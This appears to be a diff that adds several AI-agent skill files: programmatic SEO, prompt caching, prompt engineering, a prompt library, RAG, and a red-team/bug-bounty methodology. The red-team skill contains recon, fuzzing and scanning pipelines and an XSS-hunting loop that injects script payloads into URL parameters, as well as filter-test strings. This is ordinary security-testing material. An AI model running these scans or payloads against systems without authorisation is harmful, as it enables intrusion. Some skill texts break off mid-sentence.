**What it is**: Curated lists ranking or recommending options in a category.
**Why it works**:
- Comparison shoppers searching for guidance
- High commercial intent
- Evergreen with updates
**Value requirements**:
- Genuine evaluation criteria
- Real testing or expertise
- Regular updates (date visible)
- Not just affiliate-driven rankings
**URL structure**: `/best/[category]/` or `/[category]/best/`
---
### 3. Conversions
**Pattern**: "[X] to [Y]" or "[amount] [unit] in [unit]"
**Example searches**: "$10 USD to GBP", "100 kg to lbs", "pdf to word"
**What it is**: Tools or pages that convert between formats, units, or currencies.
**Why it works**:
- Instant utility
- Extremely high search volume
- Repeat usage potential
**Value requirements**:
- Accurate, real-time data
- Fast, functional tool
- Related conversions suggested
- Mobile-friendly interface
**URL structure**: `/convert/[from]-to-[to]/` or `/[from]-to-[to]-converter/`
---
### 4. Comparisons
**Pattern**: "[X] vs [Y]" or "[X] alternative"
**Example searches**: "webflow vs wordpress", "notion vs coda", "figma alternatives"
**What it is**: Head-to-head comparisons between products, tools, or options.
**Why it works**:
- High purchase intent
- Clear search pattern
- Scales with number of competitors
**Value requirements**:
- Honest, balanced analysis
- Actual feature comparison data
- Clear recommendation by use case
- Updated when products change
**URL structure**: `/compare/[x]-vs-[y]/` or `/[x]-vs-[y]/`
*See also: competitor-alternatives skill for detailed frameworks*
---
### 5. Examples
**Pattern**: "[type] examples" or "[category] inspiration"
**Example searches**: "saas landing page examples", "email subject line examples", "portfolio website examples"
**What it is**: Galleries or collections of real-world examples for inspiration.
**Why it works**:
- Research phase traffic
- Highly shareable
- Natural for design/creative tools
**Value requirements**:
- Real, high-quality examples
- Screenshots or embeds
- Categorization/filtering
- Analysis of why they work
**URL structure**: `/examples/[type]/` or `/[type]-examples/`
---
### 6. Locations
**Pattern**: "[service/thing] in [location]"
**Example searches**: "coworking spaces in san diego", "dentists in austin", "best restaurants in brooklyn"
**What it is**: Location-specific pages for services, businesses, or information.
**Why it works**:
- Local intent is massive
- Scales with geography
- Natural for marketplaces/directories
**Value requirements**:
- Actual local data (not just city name swapped)
- Local providers/options listed
- Location-specific insights (pricing, regulations)
- Map integration helpful
**URL structure**: `/[service]/[city]/` or `/locations/[city]/[service]/`
---
### 7. Personas
**Pattern**: "[product] for [audience]" or "[solution] for [role/industry]"
**Example searches**: "payroll software for agencies", "crm for real estate", "project management for freelancers"
**What it is**: Tailored landing pages addressing specific audience segments.
**Why it works**:
- Speaks directly to searcher's context
- Higher conversion than generic pages
- Scales with personas
**Value requirements**:
- Genuine persona-specific content
- Relevant features highlighted
- Testimonials from that segment
- Use cases specific to audience
**URL structure**: `/for/[persona]/` or `/solutions/[industry]/`
---
### 8. Integrations
**Pattern**: "[your product] [other product] integration" or "[product] + [product]"
**Example searches**: "slack asana integration", "zapier airtable", "hubspot salesforce sync"
**What it is**: Pages explaining how your product works with other tools.
**Why it works**:
- Captures users of other products
- High intent (they want the solution)
- Scales with integration ecosystem
**Value requirements**:
- Real integration details
- Setup instructions
- Use cases for the combination
- Working integration (not vaporware)
**URL structure**: `/integrations/[product]/` or `/connect/[product]/`
---
### 9. Glossary
**Pattern**: "what is [term]" or "[term] definition" or "[term] meaning"
**Example searches**: "what is pSEO", "api definition", "what does crm stand for"
**What it is**: Educational definitions of industry terms and concepts.
**Why it works**:
- Top-of-funnel awareness
- Establishes expertise
- Natural internal linking opportunities
**Value requirements**:
- Clear, accurate definitions
- Examples and context
- Related terms linked
- More depth than a dictionary
**URL structure**: `/glossary/[term]/` or `/learn/[term]/`
---
### 10. Translations
**Pattern**: Same content in multiple languages
**Example searches**: "qué es pSEO", "was ist SEO", "マーケティングとは"
**What it is**: Your content translated and localized for other language markets.
**Why it works**:
- Opens entirely new markets
- Lower competition in many languages
- Multiplies your content reach
**Value requirements**:
- Quality translation (not just Google Translate)
- Cultural localization
- hreflang tags properly implemented
- Native speaker review
**URL structure**: `/[lang]/[page]/` or `yoursite.com/es/`, `/de/`, etc.
---
### 11. Directory
**Pattern**: "[category] tools" or "[type] software" or "[category] companies"
**Example searches**: "ai copywriting tools", "email marketing software", "crm companies"
**What it is**: Comprehensive directories listing options in a category.
**Why it works**:
- Research phase capture
- Link building magnet
- Natural for aggregators/reviewers
**Value requirements**:
- Comprehensive coverage
- Useful filtering/sorting
- Details per listing (not just names)
- Regular updates
**URL structure**: `/directory/[category]/` or `/[category]-directory/`
---
### 12. Profiles
**Pattern**: "[person/company name]" or "[entity] + [attribute]"
**Example searches**: "stripe ceo", "airbnb founding story", "elon musk companies"
**What it is**: Profile pages about notable people, companies, or entities.
**Why it works**:
- Informational intent traffic
- Builds topical authority
- Natural for B2B, news, research
**Value requirements**:
- Accurate, sourced information
- Regularly updated
- Unique insights or aggregation
- Not just Wikipedia rehash
**URL structure**: `/people/[name]/` or `/companies/[name]/`
---
## Choosing Your Playbook
### Match to Your Assets
| If you have... | Consider... |
|----------------|-------------|
| Proprietary data | Stats, Directories, Profiles |
| Product with integrations | Integrations |
| Design/creative product | Templates, Examples |
| Multi-segment audience | Personas |
| Local presence | Locations |
| Tool or utility product | Conversions |
| Content/expertise | Glossary, Curation |
| International potential | Translations |
| Competitor landscape | Comparisons |
### Combine Playbooks
You can layer multiple playbooks:
- **Locations + Personas**: "Marketing agencies for startups in Austin"
- **Curation + Locations**: "Best coworking spaces in San Diego"
- **Integrations + Personas**: "Slack for sales teams"
- **Glossary + Translations**: Multi-language educational content
---
## Implementation Framework
### 1. Keyword Pattern Research
**Identify the pattern**:
- What's the repeating structure?
- What are the variables?
- How many unique combinations exist?
**Validate demand**:
- Aggregate search volume for pattern
- Volume distribution (head vs. long tail)
- Seasonal patterns
- Trend direction
**Assess competition**:
- Who ranks currently?
- What's their content quality?
- What's their domain authority?
- Can you realistically compete?
### 2. Data Requirements
**Identify data sources**:
- What data populates each page?
- Where does that data come from?
- Is it first-party, scraped, licensed, public?
- How is it updated?
**Data schema design**:
```
For "[Service] in [City]" pages:
city:
- name
- population
- relevant_stats
service:
- name
- description
- typical_pricing
local_providers:
- name
- rating
- reviews_count
- specialty
local_data:
- regulations
- average_prices
- market_size
```
### 3. Template Design
**Page structure**:
- Header with target keyword
- Unique intro (not just variables swapped)
- Data-driven sections
- Related pages / internal links
- CTAs appropriate to intent
**Ensuring uniqueness**:
- Each page needs unique value
- Conditional content based on data
- User-generated content where possible
- Original insights/analysis per page
**Template example**:
```
H1: [Service] in [City]: [Year] Guide
Intro: [Dynamic paragraph using city stats + service context]
Section 1: Why [City] for [Service]
[City-specific data and insights]
Section 2: Top [Service] Providers in [City]
[Data-driven list with unique details]
Section 3: Pricing for [Service] in [City]
[Local pricing data if available]
Section 4: FAQs about [Service] in [City]
[Common questions with city-specific answers]
Related: [Service] in [Nearby Cities]
```
### 4. Internal Linking Architecture
**Hub and spoke model**:
- Hub: Main category page
- Spokes: Individual programmatic pages
- Cross-links between related spokes
**Avoid orphan pages**:
- Every page reachable from main site
- Logical category structure
- XML sitemap for all pages
**Breadcrumbs**:
- Show hierarchy
- Structured data markup
- User navigation aid
### 5. Indexation Strategy
**Prioritize important pages**:
- Not all pages need to be indexed
- Index high-volume patterns
- Noindex very thin variations
**Crawl budget management**:
- Paginate thoughtfully
- Avoid infinite crawl traps
- Use robots.txt wisely
**Sitemap strategy**:
- Separate sitemaps by page type
- Monitor indexation rate
- Prioritize by importance
---
## Quality Checks
### Pre-Launch Checklist
**Content quality**:
- [ ] Each page provides unique value
- [ ] Not just variable substitution
- [ ] Answers search intent
- [ ] Readable and useful
**Technical SEO**:
- [ ] Unique titles and meta descriptions
- [ ] Proper heading structure
- [ ] Schema markup implemented
- [ ] Canonical tags correct
- [ ] Page speed acceptable
**Internal linking**:
- [ ] Connected to site architecture
- [ ] Related pages linked
- [ ] No orphan pages
- [ ] Breadcrumbs implemented
**Indexation**:
- [ ] In XML sitemap
- [ ] Crawlable
- [ ] Not blocked by robots.txt
- [ ] No conflicting noindex
### Monitoring Post-Launch
**Track**:
- Indexation rate
- Rankings by page pattern
- Traffic by page pattern
- Engagement metrics
- Conversion rate
**Watch for**:
- Thin content warnings in Search Console
- Ranking drops
- Manual actions
- Crawl errors
---
## Common Mistakes to Avoid
### Thin Content
- Just swapping city names in identical content
- No unique information per page
- "Doorway pages" that just redirect
### Keyword Cannibalization
- Multiple pages targeting same keyword
- No clear hierarchy
- Competing with yourself
### Over-Generation
- Creating pages with no search demand
- Too many low-quality pages dilute authority
- Quantity over quality
### Poor Data Quality
- Outdated information
- Incorrect data
- Missing data showing as blank
### Ignoring User Experience
- Pages exist for Google, not users
- No conversion path
- Bouncy, unhelpful content
---
## Output Format
### Strategy Document
**Opportunity Analysis**:
- Keyword pattern identified
- Search volume estimates
- Competition assessment
- Feasibility rating
**Implementation Plan**:
- Data requirements and sources
- Template structure
- Number of pages (phases)
- Internal linking plan
- Technical requirements
**Content Guidelines**:
- What makes each page unique
- Quality standards
- Update frequency
### Page Template
**URL structure**: `/category/variable/`
**Title template**: [Variable] + [Static] + [Brand]
**Meta description template**: [Pattern with variables]
**H1 template**: [Pattern]
**Content outline**: Section by section
**Schema markup**: Type and required fields
### Launch Checklist
Specific pre-launch checks for this implementation
---
## Questions to Ask
If you need more context:
1. What keyword patterns are you targeting?
2. What data do you have (or can acquire)?
3. How many pages are you planning to create?
4. What does your site authority look like?
5. Who currently ranks for these terms?
6. What's your technical stack for generating pages?
---
## Related Skills
- **seo-audit**: For auditing programmatic pages after launch
- **schema-markup**: For adding structured data to templates
- **copywriting**: For the non-templated copy portions
- **analytics-tracking**: For measuring programmatic page performance

61
skills/prompt-caching/SKILL.md Normal file
View File

@@ -0,0 +1,61 @@
---
name: prompt-caching
description: "Caching strategies for LLM prompts including Anthropic prompt caching, response caching, and CAG (Cache Augmented Generation) Use when: prompt caching, cache prompt, response cache, cag, cache augmented."
source: vibeship-spawner-skills (Apache 2.0)
---
# Prompt Caching
You're a caching specialist who has reduced LLM costs by 90% through strategic caching.
You've implemented systems that cache at multiple levels: prompt prefixes, full responses,
and semantic similarity matches.
You understand that LLM caching is different from traditional caching—prompts have
prefixes that can be cached, responses vary with temperature, and semantic similarity
often matters more than exact match.
Your core principles:
1. Cache at the right level—prefix, response, or both
2. K
## Capabilities
- prompt-cache
- response-cache
- kv-cache
- cag-patterns
- cache-invalidation
## Patterns
### Anthropic Prompt Caching
Use Claude's native prompt caching for repeated prefixes
### Response Caching
Cache full LLM responses for identical or similar queries
### Cache Augmented Generation (CAG)
Pre-cache documents in prompt instead of RAG retrieval
## Anti-Patterns
### ❌ Caching with High Temperature
### ❌ No Cache Invalidation
### ❌ Caching Everything
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Cache miss causes latency spike with additional overhead | high | // Optimize for cache misses, not just hits |
| Cached responses become incorrect over time | high | // Implement proper cache invalidation |
| Prompt caching doesn't work due to prefix changes | medium | // Structure prompts for optimal caching |
## Related Skills
Works well with: `context-window-management`, `rag-implementation`, `conversation-memory`

93
skills/prompt-engineer/SKILL.md Normal file
View File

@@ -0,0 +1,93 @@
---
name: prompt-engineer
description: "Expert in designing effective prompts for LLM-powered applications. Masters prompt structure, context management, output formatting, and prompt evaluation. Use when: prompt engineering, system prompt, few-shot, chain of thought, prompt design."
source: vibeship-spawner-skills (Apache 2.0)
---
# Prompt Engineer
**Role**: LLM Prompt Architect
I translate intent into instructions that LLMs actually follow. I know
that prompts are programming - they need the same rigor as code. I iterate
relentlessly because small changes have big effects. I evaluate systematically
because intuition about prompt quality is often wrong.
## Capabilities
- Prompt design and optimization
- System prompt architecture
- Context window management
- Output format specification
- Prompt testing and evaluation
- Few-shot example design
## Requirements
- LLM fundamentals
- Understanding of tokenization
- Basic programming
## Patterns
### Structured System Prompt
Well-organized system prompt with clear sections
```javascript
- Role: who the model is
- Context: relevant background
- Instructions: what to do
- Constraints: what NOT to do
- Output format: expected structure
- Examples: demonstration of correct behavior
```
### Few-Shot Examples
Include examples of desired behavior
```javascript
- Show 2-5 diverse examples
- Include edge cases in examples
- Match example difficulty to expected inputs
- Use consistent formatting across examples
- Include negative examples when helpful
```
### Chain-of-Thought
Request step-by-step reasoning
```javascript
- Ask model to think step by step
- Provide reasoning structure
- Request explicit intermediate steps
- Parse reasoning separately from answer
- Use for debugging model failures
```
## Anti-Patterns
### ❌ Vague Instructions
### ❌ Kitchen Sink Prompt
### ❌ No Negative Instructions
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Using imprecise language in prompts | high | Be explicit: |
| Expecting specific format without specifying it | high | Specify format explicitly: |
| Only saying what to do, not what to avoid | medium | Include explicit don'ts: |
| Changing prompts without measuring impact | medium | Systematic evaluation: |
| Including irrelevant context 'just in case' | medium | Curate context: |
| Biased or unrepresentative examples | medium | Diverse examples: |
| Using default temperature for all tasks | medium | Task-appropriate temperature: |
| Not considering prompt injection in user input | high | Defend against injection: |
## Related Skills
Works well with: `ai-agents-architect`, `rag-engineer`, `backend`, `product-manager`

322
skills/prompt-library/SKILL.md Normal file
View File

@@ -0,0 +1,322 @@
---
name: prompt-library
description: "Curated collection of high-quality prompts for various use cases. Includes role-based prompts, task-specific templates, and prompt refinement techniques. Use when user needs prompt templates, role-play prompts, or ready-to-use prompt examples for coding, writing, analysis, or creative tasks."
---
# 📝 Prompt Library
> A comprehensive collection of battle-tested prompts inspired by [awesome-chatgpt-prompts](https://github.com/f/awesome-chatgpt-prompts) and community best practices.
## When to Use This Skill
Use this skill when the user:
- Needs ready-to-use prompt templates
- Wants role-based prompts (act as X)
- Asks for prompt examples or inspiration
- Needs task-specific prompt patterns
- Wants to improve their prompting
## Prompt Categories
### 🎭 Role-Based Prompts
#### Expert Developer
```
Act as an expert software developer with 15+ years of experience. You specialize in clean code, SOLID principles, and pragmatic architecture. When reviewing code:
1. Identify bugs and potential issues
2. Suggest performance improvements
3. Recommend better patterns
4. Explain your reasoning clearly
Always prioritize readability and maintainability over cleverness.
```
#### Code Reviewer
```
Act as a senior code reviewer. Your role is to:
1. Check for bugs, edge cases, and error handling
2. Evaluate code structure and organization
3. Assess naming conventions and readability
4. Identify potential security issues
5. Suggest improvements with specific examples
Format your review as:
🔴 Critical Issues (must fix)
🟡 Suggestions (should consider)
🟢 Praise (what's done well)
```
#### Technical Writer
```
Act as a technical documentation expert. Transform complex technical concepts into clear, accessible documentation. Follow these principles:
- Use simple language, avoid jargon
- Include practical examples
- Structure with clear headings
- Add code snippets where helpful
- Consider the reader's experience level
```
#### System Architect
```
Act as a senior system architect designing for scale. Consider:
- Scalability (horizontal and vertical)
- Reliability (fault tolerance, redundancy)
- Maintainability (modularity, clear boundaries)
- Performance (latency, throughput)
- Cost efficiency
Provide architecture decisions with trade-off analysis.
```
### 🛠️ Task-Specific Prompts
#### Debug This Code
```
Debug the following code. Your analysis should include:
1. **Problem Identification**: What exactly is failing?
2. **Root Cause**: Why is it failing?
3. **Fix**: Provide corrected code
4. **Prevention**: How to prevent similar bugs
Show your debugging thought process step by step.
```
#### Explain Like I'm 5 (ELI5)
```
Explain [CONCEPT] as if I'm 5 years old. Use:
- Simple everyday analogies
- No technical jargon
- Short sentences
- Relatable examples from daily life
- A fun, engaging tone
```
#### Code Refactoring
```
Refactor this code following these priorities:
1. Readability first
2. Remove duplication (DRY)
3. Single responsibility per function
4. Meaningful names
5. Add comments only where necessary
Show before/after with explanation of changes.
```
#### Write Tests
```
Write comprehensive tests for this code:
1. Happy path scenarios
2. Edge cases
3. Error conditions
4. Boundary values
Use [FRAMEWORK] testing conventions. Include:
- Descriptive test names
- Arrange-Act-Assert pattern
- Mocking where appropriate
```
#### API Documentation
```
Generate API documentation for this endpoint including:
- Endpoint URL and method
- Request parameters (path, query, body)
- Request/response examples
- Error codes and meanings
- Authentication requirements
- Rate limits if applicable
Format as OpenAPI/Swagger or Markdown.
```
### 📊 Analysis Prompts
#### Code Complexity Analysis
```
Analyze the complexity of this codebase:
1. **Cyclomatic Complexity**: Identify complex functions
2. **Coupling**: Find tightly coupled components
3. **Cohesion**: Assess module cohesion
4. **Dependencies**: Map critical dependencies
5. **Technical Debt**: Highlight areas needing refactoring
Rate each area and provide actionable recommendations.
```
#### Performance Analysis
```
Analyze this code for performance issues:
1. **Time Complexity**: Big O analysis
2. **Space Complexity**: Memory usage patterns
3. **I/O Bottlenecks**: Database, network, disk
4. **Algorithmic Issues**: Inefficient patterns
5. **Quick Wins**: Easy optimizations
Prioritize findings by impact.
```
#### Security Review
```
Perform a security review of this code:
1. **Input Validation**: Check all inputs
2. **Authentication/Authorization**: Access control
3. **Data Protection**: Sensitive data handling
4. **Injection Vulnerabilities**: SQL, XSS, etc.
5. **Dependencies**: Known vulnerabilities
Classify issues by severity (Critical/High/Medium/Low).
```
### 🎨 Creative Prompts
#### Brainstorm Features
```
Brainstorm features for [PRODUCT]:
For each feature, provide:
- Name and one-line description
- User value proposition
- Implementation complexity (Low/Med/High)
- Dependencies on other features
Generate 10 ideas, then rank top 3 by impact/effort ratio.
```
#### Name Generator
```
Generate names for [PROJECT/FEATURE]:
Provide 10 options in these categories:
- Descriptive (what it does)
- Evocative (how it feels)
- Acronyms (memorable abbreviations)
- Metaphorical (analogies)
For each, explain the reasoning and check domain availability patterns.
```
### 🔄 Transformation Prompts
#### Migrate Code
```
Migrate this code from [SOURCE] to [TARGET]:
1. Identify equivalent constructs
2. Handle incompatible features
3. Preserve functionality exactly
4. Follow target language idioms
5. Add necessary dependencies
Show the migration step by step with explanations.
```
#### Convert Format
```
Convert this [SOURCE_FORMAT] to [TARGET_FORMAT]:
Requirements:
- Preserve all data
- Use idiomatic target format
- Handle edge cases
- Validate the output
- Provide sample verification
```
## Prompt Engineering Techniques
### Chain of Thought (CoT)
```
Let's solve this step by step:
1. First, I'll understand the problem
2. Then, I'll identify the key components
3. Next, I'll work through the logic
4. Finally, I'll verify the solution
[Your question here]
```
### Few-Shot Learning
```
Here are some examples of the task:
Example 1:
Input: [example input 1]
Output: [example output 1]
Example 2:
Input: [example input 2]
Output: [example output 2]
Now complete this:
Input: [actual input]
Output:
```
### Persona Pattern
```
You are [PERSONA] with [TRAITS].
Your communication style is [STYLE].
You prioritize [VALUES].
When responding:
- [Behavior 1]
- [Behavior 2]
- [Behavior 3]
```
### Structured Output
```
Respond in the following JSON format:
{
"analysis": "your analysis here",
"recommendations": ["rec1", "rec2"],
"confidence": 0.0-1.0,
"caveats": ["caveat1"]
}
```
## Prompt Improvement Checklist
When crafting prompts, ensure:
- [ ] **Clear objective**: What exactly do you want?
- [ ] **Context provided**: Background information included?
- [ ] **Format specified**: How should output be structured?
- [ ] **Examples given**: Are there reference examples?
- [ ] **Constraints defined**: Any limitations or requirements?
- [ ] **Success criteria**: How do you measure good output?
## Resources
- [awesome-chatgpt-prompts](https://github.com/f/awesome-chatgpt-prompts)
- [prompts.chat](https://prompts.chat)
- [Learn Prompting](https://learnprompting.org/)
---
> 💡 **Tip**: The best prompts are specific, provide context, and include examples of desired output.

90
skills/rag-engineer/SKILL.md Normal file
View File

@@ -0,0 +1,90 @@
---
name: rag-engineer
description: "Expert in building Retrieval-Augmented Generation systems. Masters embedding models, vector databases, chunking strategies, and retrieval optimization for LLM applications. Use when: building RAG, vector search, embeddings, semantic search, document retrieval."
source: vibeship-spawner-skills (Apache 2.0)
---
# RAG Engineer
**Role**: RAG Systems Architect
I bridge the gap between raw documents and LLM understanding. I know that
retrieval quality determines generation quality - garbage in, garbage out.
I obsess over chunking boundaries, embedding dimensions, and similarity
metrics because they make the difference between helpful and hallucinating.
## Capabilities
- Vector embeddings and similarity search
- Document chunking and preprocessing
- Retrieval pipeline design
- Semantic search implementation
- Context window optimization
- Hybrid search (keyword + semantic)
## Requirements
- LLM fundamentals
- Understanding of embeddings
- Basic NLP concepts
## Patterns
### Semantic Chunking
Chunk by meaning, not arbitrary token counts
```javascript
- Use sentence boundaries, not token limits
- Detect topic shifts with embedding similarity
- Preserve document structure (headers, paragraphs)
- Include overlap for context continuity
- Add metadata for filtering
```
### Hierarchical Retrieval
Multi-level retrieval for better precision
```javascript
- Index at multiple chunk sizes (paragraph, section, document)
- First pass: coarse retrieval for candidates
- Second pass: fine-grained retrieval for precision
- Use parent-child relationships for context
```
### Hybrid Search
Combine semantic and keyword search
```javascript
- BM25/TF-IDF for keyword matching
- Vector similarity for semantic matching
- Reciprocal Rank Fusion for combining scores
- Weight tuning based on query type
```
## Anti-Patterns
### ❌ Fixed Chunk Size
### ❌ Embedding Everything
### ❌ Ignoring Evaluation
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Fixed-size chunking breaks sentences and context | high | Use semantic chunking that respects document structure: |
| Pure semantic search without metadata pre-filtering | medium | Implement hybrid filtering: |
| Using same embedding model for different content types | medium | Evaluate embeddings per content type: |
| Using first-stage retrieval results directly | medium | Add reranking step: |
| Cramming maximum context into LLM prompt | medium | Use relevance thresholds: |
| Not measuring retrieval quality separately from generation | high | Separate retrieval evaluation: |
| Not updating embeddings when source documents change | medium | Implement embedding refresh: |
| Same retrieval strategy for all query types | medium | Implement hybrid search: |
## Related Skills
Works well with: `ai-agents-architect`, `prompt-engineer`, `database-architect`, `backend`

63
skills/rag-implementation/SKILL.md Normal file
View File

@@ -0,0 +1,63 @@
---
name: rag-implementation
description: "Retrieval-Augmented Generation patterns including chunking, embeddings, vector stores, and retrieval optimization Use when: rag, retrieval augmented, vector search, embeddings, semantic search."
source: vibeship-spawner-skills (Apache 2.0)
---
# RAG Implementation
You're a RAG specialist who has built systems serving millions of queries over
terabytes of documents. You've seen the naive "chunk and embed" approach fail,
and developed sophisticated chunking, retrieval, and reranking strategies.
You understand that RAG is not just vector search—it's about getting the right
information to the LLM at the right time. You know when RAG helps and when
it's unnecessary overhead.
Your core principles:
1. Chunking is critical—bad chunks mean bad retrieval
2. Hybri
## Capabilities
- document-chunking
- embedding-models
- vector-stores
- retrieval-strategies
- hybrid-search
- reranking
## Patterns
### Semantic Chunking
Chunk by meaning, not arbitrary size
### Hybrid Search
Combine dense (vector) and sparse (keyword) search
### Contextual Reranking
Rerank retrieved docs with LLM for relevance
## Anti-Patterns
### ❌ Fixed-Size Chunking
### ❌ No Overlap
### ❌ Single Retrieval Strategy
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Poor chunking ruins retrieval quality | critical | // Use recursive character text splitter with overlap |
| Query and document embeddings from different models | critical | // Ensure consistent embedding model usage |
| RAG adds significant latency to responses | high | // Optimize RAG latency |
| Documents updated but embeddings not refreshed | medium | // Maintain sync between documents and embeddings |
## Related Skills
Works well with: `context-window-management`, `conversation-memory`, `prompt-caching`, `data-pipeline`

307
skills/red-team-tools/SKILL.md Normal file
View File

@@ -0,0 +1,307 @@
---
name: Red Team Tools and Methodology
description: This skill should be used when the user asks to "follow red team methodology", "perform bug bounty hunting", "automate reconnaissance", "hunt for XSS vulnerabilities", "enumerate subdomains", or needs security researcher techniques and tool configurations from top bug bounty hunters.
---
# Red Team Tools and Methodology
## Purpose
Implement proven methodologies and tool workflows from top security researchers for effective reconnaissance, vulnerability discovery, and bug bounty hunting. Automate common tasks while maintaining thorough coverage of attack surfaces.
## Inputs/Prerequisites
- Target scope definition (domains, IP ranges, applications)
- Linux-based attack machine (Kali, Ubuntu)
- Bug bounty program rules and scope
- Tool dependencies installed (Go, Python, Ruby)
- API keys for various services (Shodan, Censys, etc.)
## Outputs/Deliverables
- Comprehensive subdomain enumeration
- Live host discovery and technology fingerprinting
- Identified vulnerabilities and attack vectors
- Automated recon pipeline outputs
- Documented findings for reporting
## Core Workflow
### 1. Project Tracking and Acquisitions
Set up reconnaissance tracking:
```bash
# Create project structure
mkdir -p target/{recon,vulns,reports}
cd target
# Find acquisitions using Crunchbase
# Search manually for subsidiary companies
# Get ASN for targets
amass intel -org "Target Company" -src
# Alternative ASN lookup
curl -s "https://bgp.he.net/search?search=targetcompany&commit=Search"
```
### 2. Subdomain Enumeration
Comprehensive subdomain discovery:
```bash
# Create wildcards file
echo "target.com" > wildcards
# Run Amass passively
amass enum -passive -d target.com -src -o amass_passive.txt
# Run Amass actively
amass enum -active -d target.com -src -o amass_active.txt
# Use Subfinder
subfinder -d target.com -silent -o subfinder.txt
# Asset discovery
cat wildcards | assetfinder --subs-only | anew domains.txt
# Alternative subdomain tools
findomain -t target.com -o
# Generate permutations with dnsgen
cat domains.txt | dnsgen - | httprobe > permuted.txt
# Combine all sources
cat amass_*.txt subfinder.txt | sort -u > all_subs.txt
```
### 3. Live Host Discovery
Identify responding hosts:
```bash
# Check which hosts are live with httprobe
cat domains.txt | httprobe -c 80 --prefer-https | anew hosts.txt
# Use httpx for more details
cat domains.txt | httpx -title -tech-detect -status-code -o live_hosts.txt
# Alternative with massdns
massdns -r resolvers.txt -t A -o S domains.txt > resolved.txt
```
### 4. Technology Fingerprinting
Identify technologies for targeted attacks:
```bash
# Whatweb scanning
whatweb -i hosts.txt -a 3 -v > tech_stack.txt
# Nuclei technology detection
nuclei -l hosts.txt -t technologies/ -o tech_nuclei.txt
# Wappalyzer (if available)
# Browser extension for manual review
```
### 5. Content Discovery
Find hidden endpoints and files:
```bash
# Directory bruteforce with ffuf
ffuf -ac -v -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
# Historical URLs from Wayback
waybackurls target.com | tee wayback.txt
# Find all URLs with gau
gau target.com | tee all_urls.txt
# Parameter discovery
cat all_urls.txt | grep "=" | sort -u > params.txt
# Generate custom wordlist from historical data
cat all_urls.txt | unfurl paths | sort -u > custom_wordlist.txt
```
### 6. Application Analysis (Jason Haddix Method)
**Heat Map Priority Areas:**
1. **File Uploads** - Test for injection, XXE, SSRF, shell upload
2. **Content Types** - Filter Burp for multipart forms
3. **APIs** - Look for hidden methods, lack of auth
4. **Profile Sections** - Stored XSS, custom fields
5. **Integrations** - SSRF through third parties
6. **Error Pages** - Exotic injection points
**Analysis Questions:**
- How does the app pass data? (Params, API, Hybrid)
- Where does the app talk about users? (UID, UUID endpoints)
- Does the site have multi-tenancy or user levels?
- Does it have a unique threat model?
- How does the site handle XSS/CSRF?
- Has the site had past writeups/exploits?
### 7. Automated XSS Hunting
```bash
# ParamSpider for parameter extraction
python3 paramspider.py --domain target.com -o params.txt
# Filter with Gxss
cat params.txt | Gxss -p test
# Dalfox for XSS testing
cat params.txt | dalfox pipe --mining-dict params.txt -o xss_results.txt
# Alternative workflow
waybackurls target.com | grep "=" | qsreplace '"><script>alert(1)</script>' | while read url; do
curl -s "$url" | grep -q 'alert(1)' && echo "$url"
done > potential_xss.txt
```
### 8. Vulnerability Scanning
```bash
# Nuclei comprehensive scan
nuclei -l hosts.txt -t ~/nuclei-templates/ -o nuclei_results.txt
# Check for common CVEs
nuclei -l hosts.txt -t cves/ -o cve_results.txt
# Web vulnerabilities
nuclei -l hosts.txt -t vulnerabilities/ -o vuln_results.txt
```
### 9. API Enumeration
**Wordlists for API fuzzing:**
```bash
# Enumerate API endpoints
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
# Test API versions
ffuf -u https://target.com/api/v1/FUZZ -w api_wordlist.txt
ffuf -u https://target.com/api/v2/FUZZ -w api_wordlist.txt
# Check for hidden methods
for method in GET POST PUT DELETE PATCH; do
curl -X $method https://target.com/api/users -v
done
```
### 10. Automated Recon Script
```bash
#!/bin/bash
domain=$1
if [[ -z $domain ]]; then
echo "Usage: ./recon.sh <domain>"
exit 1
fi
mkdir -p "$domain"
# Subdomain enumeration
echo "[*] Enumerating subdomains..."
subfinder -d "$domain" -silent > "$domain/subs.txt"
# Live host discovery
echo "[*] Finding live hosts..."
cat "$domain/subs.txt" | httpx -title -tech-detect -status-code > "$domain/live.txt"
# URL collection
echo "[*] Collecting URLs..."
cat "$domain/live.txt" | waybackurls > "$domain/urls.txt"
# Nuclei scanning
echo "[*] Running Nuclei..."
nuclei -l "$domain/live.txt" -o "$domain/nuclei.txt"
echo "[+] Recon complete!"
```
## Quick Reference
### Essential Tools
| Tool | Purpose |
|------|---------|
| Amass | Subdomain enumeration |
| Subfinder | Fast subdomain discovery |
| httpx/httprobe | Live host detection |
| ffuf | Content discovery |
| Nuclei | Vulnerability scanning |
| Burp Suite | Manual testing |
| Dalfox | XSS automation |
| waybackurls | Historical URL mining |
### Key API Endpoints to Check
```
/api/v1/users
/api/v1/admin
/api/v1/profile
/api/users/me
/api/config
/api/debug
/api/swagger
/api/graphql
```
### XSS Filter Testing
```html
<!-- Test encoding handling -->
<h1><img><table>
<script>
%3Cscript%3E
%253Cscript%253E
%26lt;script%26gt;
```
## Constraints
- Respect program scope boundaries
- Avoid DoS or fuzzing on production without permission
- Rate limit requests to avoid blocking
- Some tools may generate false positives
- API keys required for full functionality of some tools
## Examples
### Example 1: Quick Subdomain Recon
```bash
subfinder -d target.com | httpx -title | tee results.txt
```
### Example 2: XSS Hunting Pipeline
```bash
waybackurls target.com | grep "=" | qsreplace "test" | httpx -silent | dalfox pipe
```
### Example 3: Comprehensive Scan
```bash
# Full recon chain
amass enum -d target.com | httpx | nuclei -t ~/nuclei-templates/
```
## Troubleshooting
| Issue | Solution |
|-------|----------|
| Rate limited | Use proxy rotation, reduce concurrency |
| Too many results | Focus on specific technology stacks |
| False positives | Manually verify findings before reporting |
| Missing subdomains | Combine multiple enumeration sources |
| API key errors | Verify keys in config files |
| Tools not found | Install Go tools with `go install` |

602
skills/referral-program/SKILL.md Normal file
View File

@@ -0,0 +1,602 @@
---
name: referral-program
